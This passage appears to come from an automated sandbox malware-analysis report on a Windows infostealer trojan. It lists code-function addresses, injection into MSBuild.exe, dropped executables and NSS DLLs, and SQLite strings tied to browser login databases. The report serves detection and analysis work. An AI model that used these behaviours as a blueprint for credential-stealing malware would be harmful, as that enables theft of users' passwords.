Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0042CD2E	4_2_0042CD2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0041B712	4_2_0041B712
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8835A0	4_2_6C8835A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C896C80	4_2_6C896C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8E34A0	4_2_6C8E34A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8EC4A0	4_2_6C8EC4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8964C0	4_2_6C8964C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8AD4D0	4_2_6C8AD4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C88D4E0	4_2_6C88D4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8C6CF0	4_2_6C8C6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8FAC00	4_2_6C8FAC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8C5C10	4_2_6C8C5C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8D2C10	4_2_6C8D2C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8F542B	4_2_6C8F542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C895440	4_2_6C895440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8F545C	4_2_6C8F545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8C0DD0	4_2_6C8C0DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8E85F0	4_2_6C8E85F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C89FD00	4_2_6C89FD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8B0512	4_2_6C8B0512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8AED10	4_2_6C8AED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8EE680	4_2_6C8EE680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8A5E90	4_2_6C8A5E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8E4EA0	4_2_6C8E4EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8F76E3	4_2_6C8F76E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C88BEF0	4_2_6C88BEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C89FEF0	4_2_6C89FEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8D5600	4_2_6C8D5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8C7E10	4_2_6C8C7E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8E9E30	4_2_6C8E9E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8D2E4E	4_2_6C8D2E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8A4640	4_2_6C8A4640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8A9E50	4_2_6C8A9E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8C3E50	4_2_6C8C3E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8F6E63	4_2_6C8F6E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C88C670	4_2_6C88C670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8D77A0	4_2_6C8D77A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C88DFE0	4_2_6C88DFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8B6FF0	4_2_6C8B6FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C899F00	4_2_6C899F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8C7710	4_2_6C8C7710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8B60A0	4_2_6C8B60A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8F50C7	4_2_6C8F50C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8AC0E0	4_2_6C8AC0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8C58E0	4_2_6C8C58E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C897810	4_2_6C897810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8CB820	4_2_6C8CB820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8D4820	4_2_6C8D4820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8A8850	4_2_6C8A8850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8AD850	4_2_6C8AD850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8CF070	4_2_6C8CF070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8C5190	4_2_6C8C5190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8E2990	4_2_6C8E2990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C88C9A0	4_2_6C88C9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8BD9B0	4_2_6C8BD9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8AA940	4_2_6C8AA940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C89D960	4_2_6C89D960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8DB970	4_2_6C8DB970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8FB170	4_2_6C8FB170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8FBA90	4_2_6C8FBA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8822A0	4_2_6C8822A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8B4AA0	4_2_6C8B4AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C89CAB0	4_2_6C89CAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8F2AB0	4_2_6C8F2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8C8AC0	4_2_6C8C8AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8A1AF0	4_2_6C8A1AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8CE2F0	4_2_6C8CE2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8C9A60	4_2_6C8C9A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C88F380	4_2_6C88F380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8F53C8	4_2_6C8F53C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8CD320	4_2_6C8CD320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C885340	4_2_6C885340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C89C370	4_2_6C89C370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C98ECD0	4_2_6C98ECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C92ECC0	4_2_6C92ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6CA0AC30	4_2_6CA0AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9F6C00	4_2_6C9F6C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C93AC60	4_2_6C93AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9C6D90	4_2_6C9C6D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C934DB0	4_2_6C934DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6CABCDC0	4_2_6CABCDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6CAB8D20	4_2_6CAB8D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9FED70	4_2_6C9FED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6CA5AD50	4_2_6CA5AD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9B6E90	4_2_6C9B6E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C93AEC0	4_2_6C93AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9D0EC0	4_2_6C9D0EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6CA10E20	4_2_6CA10E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9CEE70	4_2_6C9CEE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6CA78FB0	4_2_6CA78FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C93EFB0	4_2_6C93EFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6CA0EFF0	4_2_6CA0EFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C930FE0	4_2_6C930FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C936F10	4_2_6C936F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6CA70F20	4_2_6CA70F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C99EF40	4_2_6C99EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9F2F70	4_2_6C9F2F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6CA368E0	4_2_6CA368E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C980820	4_2_6C980820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9BA820	4_2_6C9BA820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6CA04840	4_2_6CA04840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9F09B0	4_2_6C9F09B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9C09A0	4_2_6C9C09A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9EA9A0	4_2_6C9EA9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6CA4C9E0	4_2_6CA4C9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9649F0	4_2_6C9649F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C986900	4_2_6C986900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C968960	4_2_6C968960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9AEA80	4_2_6C9AEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9DEA00	4_2_6C9DEA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9E8A30	4_2_6C9E8A30
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00AF20AD	13_2_00AF20AD
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B240E8	13_2_00B240E8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B500E8	13_2_00B500E8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B3A078	13_2_00B3A078
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B5C118	13_2_00B5C118
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B4E4B8	13_2_00B4E4B8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B48468	13_2_00B48468
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B22558	13_2_00B22558
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B4E6F8	13_2_00B4E6F8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B06625	13_2_00B06625
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B20648	13_2_00B20648
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B22AA8	13_2_00B22AA8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B56B38	13_2_00B56B38
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B24DE8	13_2_00B24DE8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B1EEF8	13_2_00B1EEF8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B5B1B8	13_2_00B5B1B8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B191CA	13_2_00B191CA
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B23148	13_2_00B23148
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B1F2A8	13_2_00B1F2A8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B1D2E2	13_2_00B1D2E2
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B19265	13_2_00B19265
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B1925D	13_2_00B1925D
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B1D248	13_2_00B1D248
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B19392	13_2_00B19392
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B093D2	13_2_00B093D2
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B19461	13_2_00B19461
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B235D8	13_2_00B235D8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B1B658	13_2_00B1B658
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B5FAB8	13_2_00B5FAB8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B45A23	13_2_00B45A23
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B29A28	13_2_00B29A28
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B1FCA8	13_2_00B1FCA8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B35CD6	13_2_00B35CD6
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00AF1E05	13_2_00AF1E05
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B5FF78	13_2_00B5FF78

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6C8C94D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6C8BCBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 00410609 appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004104E7 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6CAB09D0 appears 99 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00617A20 appears 51 times
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: String function: 00AF7A20 appears 51 times
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: String function: 00B24BC8 appears 97 times
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: String function: 00B26AA8 appears 171 times

One or more processes crash

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 308

PE / OLE file has an invalid certificate

Source: file.exe

Static PE information: invalid certificate

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: .data ZLIB complexity 0.9919468068035944
Source: CBFCFBFBFB.exe.4.dr	Static PE information: Section: .data ZLIB complexity 0.9911440122377623
Source: a43486128347[1].exe.4.dr	Static PE information: Section: .data ZLIB complexity 0.9911440122377623

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@22/32@14/5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 4_2_6C8E7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

4_2_6C8E7030

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 4_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

4_2_004114A5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 4_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,

4_2_00411807

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\76561199780418869[1].htm

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3636
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess900
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7004:120:WilError_03

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File created: C:\Users\user\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: C:\ProgramData\CBFCFBFBFB.exe	Command line argument: MZx	13_2_00AF20AD
Source: C:\ProgramData\CBFCFBFBFB.exe	Command line argument: MZx	13_2_00AF20AD
Source: C:\ProgramData\CBFCFBFBFB.exe	Command line argument: MZx	13_2_00AF20AD

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: MSBuild.exe, MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: BGDGHJ.4.dr, GCFBAK.4.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
